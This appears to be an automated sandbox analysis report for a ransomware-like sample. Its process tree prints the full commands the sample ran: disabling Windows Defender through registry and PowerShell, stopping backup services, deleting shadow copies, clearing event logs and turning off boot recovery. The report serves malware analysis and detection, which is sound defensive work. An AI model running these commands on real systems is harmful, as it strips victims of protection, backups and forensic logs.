3024 net.exe net1.exe PID 2788 wrote to memory of 3904 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 3904 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 3904 wrote to memory of 2756 3904 net.exe net1.exe PID 3904 wrote to memory of 2756 3904 net.exe net1.exe PID 2788 wrote to memory of 3944 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 3944 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 3944 wrote to memory of 2760 3944 net.exe net1.exe PID 3944 wrote to memory of 2760 3944 net.exe net1.exe PID 2788 wrote to memory of 1444 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 1444 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1444 wrote to memory of 512 1444 net.exe net1.exe PID 1444 wrote to memory of 512 1444 net.exe net1.exe PID 2788 wrote to memory of 1504 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 1504 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1504 wrote to memory of 3304 1504 net.exe net1.exe PID 1504 wrote to memory of 3304 1504 net.exe net1.exe PID 2788 wrote to memory of 516 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 516 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 516 wrote to memory of 776 516 net.exe net1.exe PID 516 wrote to memory of 776 516 net.exe net1.exe PID 2788 wrote to memory of 1328 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 1328 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1328 wrote to memory of 324 1328 net.exe net1.exe PID 1328 wrote to memory of 324 1328 net.exe net1.exe PID 2788 wrote to memory of 3876 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 3876 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 3876 wrote to memory of 404 3876 net.exe net1.exe PID 3876 wrote to memory of 404 3876 net.exe net1.exe PID 2788 wrote to memory of 604 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 604 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 712 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 712 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 2864 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 2864 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 996 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 996 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 2096 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 2096 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 1316 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 1316 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 1396 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 1396 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 1756 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 1756 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 3932 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 3932 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 2788 wrote to memory of 1900 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 1900 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 1824 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 1824 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 2392 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 2392 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 3652 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 3652 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 3264 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe PID 2788 wrote to memory of 3264 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1284
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2784
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2756
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2760
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:512
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3304
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:776
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:324
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12b50" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12b50" /y3⤵PID:404
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:604
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:712
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2864
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:996
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:2096
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1316
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1396
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1756
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12b50" start= disabled2⤵PID:3932
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1900
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1824
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2392
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3652
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3264
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1920
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1876
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3564
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3152
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2160
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3916
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3628
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3440
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1804
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2724
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3004
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1436
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3164
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3136
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3204
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2792
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2704
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1084
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3432
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:376 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:824 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1064 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3508
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1452
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1740
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1912
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3224 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3000
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2380 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2056 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3180 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4004 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2180 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2348 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2184
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3304 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1916
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
ef4053e33705196e46e1aa68eee4917a
SHA1f03851f8bff4cc626259d86dd195da0dd2f5e598
SHA2560e3a0fddcc6bd3a000f00628a0f1e52a87058f293b56fbfa6bcd6da6a5f6c2a4
SHA512758e3cec41382b6c2cadc2a45ee549ad3b331e0c353f4128e8faefa538eb2e3300dbaeca209f735e4d4b9ec4ce64f676daff36a9a88d7d482beb33f328d3e1b8